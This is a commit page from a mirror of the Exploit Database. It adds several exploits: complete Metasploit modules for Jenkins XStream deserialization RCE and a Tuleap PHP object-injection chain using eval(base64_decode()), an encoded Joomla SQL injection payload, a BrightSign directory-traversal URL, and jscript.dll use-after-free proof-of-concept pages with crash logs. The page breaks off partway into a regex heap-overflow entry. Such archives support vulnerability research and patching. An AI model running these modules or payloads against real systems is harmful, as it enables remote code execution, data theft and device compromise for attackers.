bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-20

Browse source 
12 changes to exploits/shellcodes

Microsoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free
Microsoft Internet Explorer 11 - 'jscript!JSONStringifyObject' Use-After-Free
Microsoft Windows - 'jscript!RegExpComp::Compile' Heap Overflow Through IE or Local Network via WPAD
Microsoft Windows - jscript.dll 'Array.sort' Heap Overflow
Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable
Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read
Intel Content Protection HECI Service - Type Confusion Privilege Escalation

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)
Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)
Jenkins - XStream Groovy classpath Deserialization (Metasploit)
BrightSign Digital Signage - Multiple Vulnerablities
Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection
This commit is contained in:
Offensive Security 2017-12-20 05:02:22 +00:00
parent f76fbb1072
commit f93f05e46f
13 changed files with 1353 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

40
exploits/hardware/webapps/43364.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: BrightSign Digital Signage (Multiple Vulnerabilities)
# Date: 12/15/17
# Exploit Author: singularitysec@gmail.com
# Vectors: XSS, Directory Traversal, File Modification, Information Leakage
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below)
suffers from multiple vulnerabilities.
The pages:
/network_diagnostics.html
/storage_info.html
Suffer from a Cross-Site Scripting vulnerability. The REF parameter for
these pages do not sanitize user input, resulting in arbitrary execution,
token theft and related attacks.
The RP parameter in STORAGE.HTML suffers from a directory
traversal/information leakage weakness:
/storage.html?rp=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc
Through parameter manipulation, the file system can be traversed,
unauthenticated, allowing for leakage of information and compromise of the
device.
This page also allows for unauthenticated upload of files.
/tools.html
Page allows for unauthenticated rename/manipulation of files.
When combined, these vulnerabilities allow for compromise of both end users
and the device itself.
Ex. A malicious attacker can upload a malicious page of their choosing and
steal credentials, host malicious content or distribute content through the
device, which accepts large format SD cards.

141
exploits/multiple/remote/43375.rb Executable file
View file

@ -0,0 +1,141 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins XStream Groovy classpath Deserialization Vulnerability',
'Description' => %q{
This module exploits CVE-2016-0792 a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions
older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath,
which allows remote arbitrary code execution. The issue affects default installations. Authentication
is not required to exploit the vulnerability.
},
'Author' =>
[
'Arshan Dabirsiaghi', # Vulnerability discovery
'Matt Byrne <attackdebris[at]gmail.com>' # Metasploit module
],
'DisclosureDate' => 'Feb 24 2016',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-0792'],
['URL', 'https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'],
['URL', 'https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413']
],
'Platform' => %w{ win linux unix },
'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],
'Targets' => [
['Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD
],
['Python (In-Memory)',
'Platform' => 'python',
'Arch' => ARCH_PYTHON
],
['Linux (Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64]
],
['Windows (Dropper)',
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
Opt::RPORT('8080')
])
deregister_options('URIPATH')
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
unless res
fail_with(Failure::Unknown, 'The connection timed out.')
end
http_headers = res.headers
if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f < 1.650
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
case target.name
when /Unix/, /Python/
execute_command(payload.encoded)
else
execute_cmdstager
end
end
# Exploit methods
def execute_command(cmd, opts = {})
cmd = case target.name
when /Unix/, /Linux/
%W{/bin/sh -c #{cmd}}
when /Python/
%W{python -c #{cmd}}
when /Windows/
%W{cmd.exe /c #{cmd}}
end
# Encode each command argument with XML entities
cmd.map! { |arg| arg.encode(xml: :text) }
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/createItem'),
'vars_get' => { 'name' => 'random' },
'ctype' => 'application/xml',
'data' => xstream_payload(cmd)
)
end
def xstream_payload(cmd)
<<EOF
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando"/>
<owner class="java.lang.ProcessBuilder">
<command>
<string>#{cmd.join('</string><string>')}</string>
</command>
</owner>
<method>start</method>
</org.codehaus.groovy.runtime.MethodClosure>
</entry>
</expandoProperties>
</groovy.util.Expando>
<int>1</int>
</entry>
</map>
EOF
end
end

184
exploits/php/remote/43374.rb Executable file
View file

@ -0,0 +1,184 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Tuleap 9.6 Second-Order PHP Object Injection',
'Description' => %q{
This module exploits a Second-Order PHP Object Injection vulnerability in Tuleap <= 9.6 which
could be abused by authenticated users to execute arbitrary PHP code with the permissions of the
webserver. The vulnerability exists because of the User::getRecentElements() method is using the
unserialize() function with data that can be arbitrarily manipulated by a user through the REST
API interface. The exploit's POP chain abuses the __toString() method from the Mustache class
to reach a call to eval() in the Transition_PostActionSubFactory::fetchPostActions() method.
},
'Author' => 'EgiX',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://karmainsecurity.com/KIS-2017-02'],
['URL', 'https://tuleap.net/plugins/tracker/?aid=10118'],
['CVE', '2017-7411']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Tuleap <= 9.6', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 23 2017'
))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
OptString.new('PASSWORD', [true, "The password to authenticate with" ]),
OptInt.new('AID', [ false, "The Artifact ID you have access to", "1"]),
Opt::RPORT(443)
])
end
def setup_popchain(random_param)
print_status("Trying to login through the REST API...")
user = datastore['USERNAME']
pass = datastore['PASSWORD']
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api/tokens'),
'ctype' => 'application/json',
'data' => {'username' => user, 'password' => pass}.to_json
})
unless res && (res.code == 201 || res.code == 200) && res.body
msg = "Login failed with #{user}:#{pass}"
print_error(msg) if @is_check
fail_with(Failure::NoAccess, msg)
end
body = JSON.parse(res.body)
uid = body['user_id']
token = body['token']
print_good("Login successful with #{user}:#{pass}")
print_status("Updating user preference with POP chain string...")
php_code = "null;eval(base64_decode($_POST['#{random_param}']));//"
pop_chain = 'a:1:{i:0;a:1:{'
pop_chain << 's:2:"id";O:8:"Mustache":2:{'
pop_chain << 'S:12:"\00*\00_template";'
pop_chain << 's:42:"{{#fetchPostActions}}{{/fetchPostActions}}";'
pop_chain << 'S:11:"\00*\00_context";a:1:{'
pop_chain << 'i:0;O:34:"Transition_PostAction_FieldFactory":1:{'
pop_chain << 'S:23:"\00*\00post_actions_classes";a:1:{'
pop_chain << "i:0;s:#{php_code.length}:\"#{php_code}\";}}}}}}"
pref = {'id' => uid, 'preference' => {'key' => 'recent_elements', 'value' => pop_chain}}
res = send_request_cgi({
'method' => 'PATCH',
'uri' => normalize_uri(target_uri.path, "api/users/#{uid}/preferences"),
'ctype' => 'application/json',
'headers' => {'X-Auth-Token' => token, 'X-Auth-UserId' => uid},
'data' => pref.to_json
})
unless res && res.code == 200
msg = "Something went wrong"
print_error(msg) if @is_check
fail_with(Failure::UnexpectedReply, msg)
end
end
def do_login
print_status("Retrieving the CSRF token for login...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'account/login.php')
})
if res && res.code == 200 && res.body && res.get_cookies
if res.body =~ /name="challenge" value="(\w+)">/
csrf_token = $1
print_good("CSRF token: #{csrf_token}")
else
print_warning("CSRF token not found. Trying to login without it...")
end
else
msg = "Failed to retrieve the login page"
print_error(msg) if @is_check
fail_with(Failure::NoAccess, msg)
end
user = datastore['USERNAME']
pass = datastore['PASSWORD']
res = send_request_cgi({
'method' => 'POST',
'cookie' => res.get_cookies,
'uri' => normalize_uri(target_uri.path, 'account/login.php'),
'vars_post' => {'form_loginname' => user, 'form_pw' => pass, 'challenge' => csrf_token}
})
unless res && res.code == 302
msg = "Login failed with #{user}:#{pass}"
print_error(msg) if @is_check
fail_with(Failure::NoAccess, msg)
end
print_good("Login successful with #{user}:#{pass}")
res.get_cookies
end
def exec_php(php_code)
random_param = rand_text_alpha(10)
setup_popchain(random_param)
session_cookies = do_login()
print_status("Triggering the POP chain...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "plugins/tracker/?aid=#{datastore['AID']}"),
'cookie' => session_cookies,
'vars_post' => {random_param => Rex::Text.encode_base64(php_code)}
})
if res && res.code == 200 && res.body =~ /Exiting with Error/
msg = "No access to Artifact ID #{datastore['AID']}"
@is_check ? print_error(msg) : fail_with(Failure::NoAccess, msg)
end
res
end
def check
@is_check = true
flag = rand_text_alpha(rand(10)+20)
res = exec_php("print '#{flag}';")
if res && res.code == 200 && res.body =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
elsif res && res.body =~ /Exiting with Error/
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def exploit
@is_check = false
exec_php(payload.encoded)
end
end

27
exploits/php/webapps/43365.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection
# Dork: N/A
# Date: 19.12.2017
# Vendor Homepage: hhttp://nextgeneditor.com/
# Software Link: https://extensions.joomla.org/extension/nextgen-editor/
# Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free
# Version: 2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL]
#
# %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d
#
# # # # #

186
exploits/windows/dos/43367.html Normal file
View file

@ -0,0 +1,186 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1376
There is a use-after-free vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
- The issue can also be exploited by opening a malicious web page in Internet Explorer.
The issue has been verified on 64-bit Win7 with the most recent patches applied.
PoC for Internet Explorer (might require page heap to trigger the crash):
============================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};
function f() {
vars[1] = 1;
CollectGarbage();
return {};
}
vars[1].toString = f;
Array.prototype.join.call(vars);
</script>
<!--
============================================
PoC for WPAD (might require page heap to trigger the crash):
============================================
function FindProxyForURL(url, host) {
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};
function f() {
vars[1] = 1;
CollectGarbage();
return {};
}
vars[1].toString = f;
Array.prototype.join.call(vars);
return "DIRECT";
}
===========================================
Technical details:
The issue is in NameTbl::GetValDef which is called when an object is converted to a string. The function attempts to call toString() or valueOf() of the NameTbl object 2 times or until the return value isn't an JavaScript object. The issue is that the NameTbl object on which these methods are called isn't explicitly tracked by the garbage collector, which means the object can be deleted inside the toString/valueOf callback (as long as it's not tracked by the garbage collector somewhere else). Basically, toString/valueOf can delete its 'this' object.
Note that the crash location in the Debug log immediately precedes a virtual method call.
Debug log (from IE, but it looks similar in the WPAD service):
============================================
(a68.e4c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
0:013> r
rax=0000000000000001 rbx=000007fef5d7bd50 rcx=00000000044acfa0
rdx=0000000000000000 rsi=0000000012b49fb8 rdi=0000000000000001
rip=000007fef5dea398 rsp=0000000012b49ae0 rbp=0000000000000000
r8=0000000004309f20 r9=0000000004309670 r10=0000000000000081
r11=0000000012b49a60 r12=0000000000000080 r13=0000000000000008
r14=00000000044d9f90 r15=0000000000000000
iopl=0 nv up ei ng nz ac po cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 00000000`12b49ae0 000007fe`f5dad069 jscript!NameTbl::GetValDef+0x58
01 00000000`12b49b70 000007fe`f5d7de69 jscript!NameTbl::InvokeInternal+0xb07
02 00000000`12b49c90 000007fe`f5d7bf3b jscript!VAR::GetValue+0xa1
03 00000000`12b49ce0 000007fe`f5ddb65d jscript!ConvertToString+0x5b
04 00000000`12b49f60 000007fe`f5d7c2ec jscript!JsArrayJoin+0x38d
05 00000000`12b4a060 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
06 00000000`12b4a110 000007fe`f5d786ea jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`12b4a230 000007fe`f5dcdd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
08 00000000`12b4a280 000007fe`f5d7c2ec jscript!JsFncCall+0xc2
09 00000000`12b4a310 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
0a 00000000`12b4a3c0 000007fe`f5d7b234 jscript!NameTbl::InvokeInternal+0x3f8
0b 00000000`12b4a4e0 000007fe`f5d79852 jscript!VAR::InvokeByName+0x81c
0c 00000000`12b4a6f0 000007fe`f5d79929 jscript!VAR::InvokeDispName+0x72
0d 00000000`12b4a770 000007fe`f5d724b8 jscript!VAR::InvokeByDispID+0x1229
0e 00000000`12b4a7c0 000007fe`f5d78ec2 jscript!CScriptRuntime::Run+0x5a6
0f 00000000`12b4b5c0 000007fe`f5d78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
10 00000000`12b4b7d0 000007fe`f5d78b95 jscript!ScrFncObj::Call+0xb7
11 00000000`12b4b870 000007fe`f5d7e6c0 jscript!CSession::Execute+0x19e
12 00000000`12b4b940 000007fe`f5d870e7 jscript!COleScript::ExecutePendingScripts+0x17a
13 00000000`12b4ba10 000007fe`f5d868d6 jscript!COleScript::ParseScriptTextCore+0x267
14 00000000`12b4bb00 000007fe`ead55251 jscript!COleScript::ParseScriptText+0x56
15 00000000`12b4bb60 000007fe`eb4db320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
16 00000000`12b4bbe0 000007fe`ead56256 MSHTML!CScriptCollection::ParseScriptText+0x37f
17 00000000`12b4bcc0 000007fe`ead55c8e MSHTML!CScriptData::CommitCode+0x3d9
18 00000000`12b4be90 000007fe`ead55a11 MSHTML!CScriptData::Execute+0x283
19 00000000`12b4bf50 000007fe`eb5146fb MSHTML!CHtmScriptParseCtx::Execute+0x101
1a 00000000`12b4bf90 000007fe`eadf8a5b MSHTML!CHtmParseBase::Execute+0x235
1b 00000000`12b4c030 000007fe`eacd2e39 MSHTML!CHtmPost::Broadcast+0x90
1c 00000000`12b4c070 000007fe`ead2caef MSHTML!CHtmPost::Exec+0x4bb
1d 00000000`12b4c280 000007fe`ead2ca40 MSHTML!CHtmPost::Run+0x3f
1e 00000000`12b4c2b0 000007fe`ead2da12 MSHTML!PostManExecute+0x70
1f 00000000`12b4c330 000007fe`ead30843 MSHTML!PostManResume+0xa1
20 00000000`12b4c370 000007fe`ead16fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
21 00000000`12b4c3c0 000007fe`eb544f78 MSHTML!CDwnChan::OnMethodCall+0x41
22 00000000`12b4c3f0 000007fe`eac39d75 MSHTML!GlobalWndOnMethodCall+0x240
23 00000000`12b4c490 00000000`77709bbd MSHTML!GlobalWndProc+0x150
24 00000000`12b4c510 00000000`777098c2 USER32!UserCallWinProcCheckWow+0x1ad
25 00000000`12b4c5d0 000007fe`f2be4a87 USER32!DispatchMessageWorker+0x3b5
26 00000000`12b4c650 000007fe`f2bebabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
27 00000000`12b4f8d0 000007fe`fe88572f IEFRAME!LCIETab_ThreadProc+0x3a3
28 00000000`12b4fa00 000007fe`f5ff925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
29 00000000`12b4fa30 00000000`775e59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
2a 00000000`12b4fa80 00000000`7781a561 kernel32!BaseThreadInitThunk+0xd
2b 00000000`12b4fab0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
0:013> !heap -p -a 00000000`044d9f90
address 00000000044d9f90 found in
_DPH_HEAP_ROOT @ 3fd1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
3fe0680: 44d9000 2000
000007fef5f78726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
00000000778b4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
000000007785797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
000007feff2110c8 msvcrt!free+0x000000000000001c
000007fef5d7bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
000007fef5d7b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
000007fef5d942cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
000007fef5d719e2 jscript!GcContext::Reclaim+0x00000000000000ae
000007fef5d81956 jscript!GcContext::CollectCore+0x000000000000018b
000007fef5d817a5 jscript!GcContext::Collect+0x0000000000000025
000007fef5dc42f3 jscript!JsCollectGarbage+0x0000000000000023
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5d724b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007fef5d78ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
000007fef5d78d2b jscript!ScrFncObj::Call+0x00000000000000b7
000007fef5da2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5dea422 jscript!NameTbl::GetValDef+0x00000000000000e2
000007fef5dad069 jscript!NameTbl::InvokeInternal+0x0000000000000b07
000007fef5d7de69 jscript!VAR::GetValue+0x00000000000000a1
000007fef5d7bf3b jscript!ConvertToString+0x000000000000005b
000007fef5ddb65d jscript!JsArrayJoin+0x000000000000038d
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5dcdd72 jscript!JsFncCall+0x00000000000000c2
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007fef5d7b234 jscript!VAR::InvokeByName+0x000000000000081c
000007fef5d79852 jscript!VAR::InvokeDispName+0x0000000000000072
0:013> u rip
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14]
000007fe`f5dea39b 488b98e0000000 mov rbx,qword ptr [rax+0E0h]
000007fe`f5dea3a2 488bcb mov rcx,rbx
000007fe`f5dea3a5 ff15b5320400 call qword ptr [jscript!_guard_check_icall_fptr (000007fe`f5e2d660)]
000007fe`f5dea3ab 488b54fc40 mov rdx,qword ptr [rsp+rdi*8+40h]
000007fe`f5dea3b0 4c8d442450 lea r8,[rsp+50h]
000007fe`f5dea3b5 498bce mov rcx,r14
000007fe`f5dea3b8 ffd3 call rbx
============================================
-->

140
exploits/windows/dos/43368.html Normal file
View file

@ -0,0 +1,140 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1381
There is a use-after-free in jscript.dll library that can be exploited in IE11.
PoC:
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var o1 = {toJSON:function(){
alert('o1');
return [o2];
}}
var o2 = {toJSON:function(){
alert('o2');
CollectGarbage();
return 'x';
}}
JSON.stringify(o1);
</script>
<!--
=========================================
Technical details:
JSONStringifyObject first calls JSONApplyFilters which calls an argument's toString method. However the return value of the toString method won't be on the garbage collector's root object list and thus can be freed during subsequent callbacks.
Debug log:
=========================================
0:028> g
(df8.e48): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!JSONStringifyArray+0x38f:
000007fe`edbf9fb3 66214738 and word ptr [rdi+38h],ax ds:00000000`04518fc8=????
0:014> r
rax=000000000000fffb rbx=0000000000000000 rcx=0000000000000005
rdx=0000000000000005 rsi=00000000129ca100 rdi=0000000004518f90
rip=000007feedbf9fb3 rsp=00000000129c9f30 rbp=00000000129c9fa9
r8=0000000000000000 r9=000000000405d670 r10=0000000000000081
r11=00000000129c9f00 r12=0000000000000001 r13=0000000000000001
r14=0000000000000000 r15=00000000129ca1a8
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
jscript!JSONStringifyArray+0x38f:
000007fe`edbf9fb3 66214738 and word ptr [rdi+38h],ax ds:00000000`04518fc8=????
0:014> k
# Child-SP RetAddr Call Site
00 00000000`129c9f30 000007fe`edbfa2cc jscript!JSONStringifyArray+0x38f
01 00000000`129ca000 000007fe`edbfec94 jscript!JSONStringifyObject+0x2dc
02 00000000`129ca0b0 000007fe`edb9c2ec jscript!JsJSONStringify+0x3e4
03 00000000`129ca190 000007fe`edb9a9fe jscript!NatFncObj::Call+0x138
04 00000000`129ca240 000007fe`edb9b234 jscript!NameTbl::InvokeInternal+0x3f8
05 00000000`129ca360 000007fe`edb99852 jscript!VAR::InvokeByName+0x81c
06 00000000`129ca570 000007fe`edb99929 jscript!VAR::InvokeDispName+0x72
07 00000000`129ca5f0 000007fe`edb924b8 jscript!VAR::InvokeByDispID+0x1229
08 00000000`129ca640 000007fe`edb98ec2 jscript!CScriptRuntime::Run+0x5a6
09 00000000`129cb440 000007fe`edb98d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
0a 00000000`129cb650 000007fe`edb98b95 jscript!ScrFncObj::Call+0xb7
0b 00000000`129cb6f0 000007fe`edb9e6c0 jscript!CSession::Execute+0x19e
0c 00000000`129cb7c0 000007fe`edba70e7 jscript!COleScript::ExecutePendingScripts+0x17a
0d 00000000`129cb890 000007fe`edba68d6 jscript!COleScript::ParseScriptTextCore+0x267
0e 00000000`129cb980 000007fe`ee2f5251 jscript!COleScript::ParseScriptText+0x56
0f 00000000`129cb9e0 000007fe`eea7b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
10 00000000`129cba60 000007fe`ee2f6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
11 00000000`129cbb40 000007fe`ee2f5c8e MSHTML!CScriptData::CommitCode+0x3d9
12 00000000`129cbd10 000007fe`ee2f5a11 MSHTML!CScriptData::Execute+0x283
13 00000000`129cbdd0 000007fe`eeab46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
14 00000000`129cbe10 000007fe`ee398a5b MSHTML!CHtmParseBase::Execute+0x235
15 00000000`129cbeb0 000007fe`ee272e39 MSHTML!CHtmPost::Broadcast+0x90
16 00000000`129cbef0 000007fe`ee2ccaef MSHTML!CHtmPost::Exec+0x4bb
17 00000000`129cc100 000007fe`ee2cca40 MSHTML!CHtmPost::Run+0x3f
18 00000000`129cc130 000007fe`ee2cda12 MSHTML!PostManExecute+0x70
19 00000000`129cc1b0 000007fe`ee2d0843 MSHTML!PostManResume+0xa1
1a 00000000`129cc1f0 000007fe`ee2b6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1b 00000000`129cc240 000007fe`eeae4f78 MSHTML!CDwnChan::OnMethodCall+0x41
1c 00000000`129cc270 000007fe`ee1d9d75 MSHTML!GlobalWndOnMethodCall+0x240
1d 00000000`129cc310 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1e 00000000`129cc390 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1f 00000000`129cc450 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
20 00000000`129cc4d0 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
21 00000000`129cf750 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
22 00000000`129cf880 000007fe`efb2925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
23 00000000`129cf8b0 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
24 00000000`129cf900 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
25 00000000`129cf930 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
0:014> !heap -p -a 00000000`04518fc8
address 0000000004518fc8 found in
_DPH_HEAP_ROOT @ 3d31000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
3d49750: 4518000 2000
000007feefb88726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
00000000774c4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
000000007746797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
000007fefd4b10c8 msvcrt!free+0x000000000000001c
000007feedb9bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
000007feedb9b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
000007feedbb42cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
000007feedb919e2 jscript!GcContext::Reclaim+0x00000000000000ae
000007feedba1956 jscript!GcContext::CollectCore+0x000000000000018b
000007feedba17a5 jscript!GcContext::Collect+0x0000000000000025
000007feedbe42f3 jscript!JsCollectGarbage+0x0000000000000023
000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
000007feedb9c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
000007feedb98d2b jscript!ScrFncObj::Call+0x00000000000000b7
000007feedbc2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007feedbf8ee3 jscript!GCProtectKeyAndCall+0x000000000000009f
000007feedbf97a6 jscript!JSONApplyFilters+0x000000000000014a
000007feedbfa08b jscript!JSONStringifyObject+0x000000000000009b
000007feedbf9e77 jscript!JSONStringifyArray+0x0000000000000253
000007feedbfa2cc jscript!JSONStringifyObject+0x00000000000002dc
000007feedbfec94 jscript!JsJSONStringify+0x00000000000003e4
000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
000007feedb9a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007feedb9b234 jscript!VAR::InvokeByName+0x000000000000081c
000007feedb99852 jscript!VAR::InvokeDispName+0x0000000000000072
000007feedb99929 jscript!VAR::InvokeByDispID+0x0000000000001229
000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
=========================================
-->

150
exploits/windows/dos/43369.html Normal file
View file

@ -0,0 +1,150 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1369
There is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors:
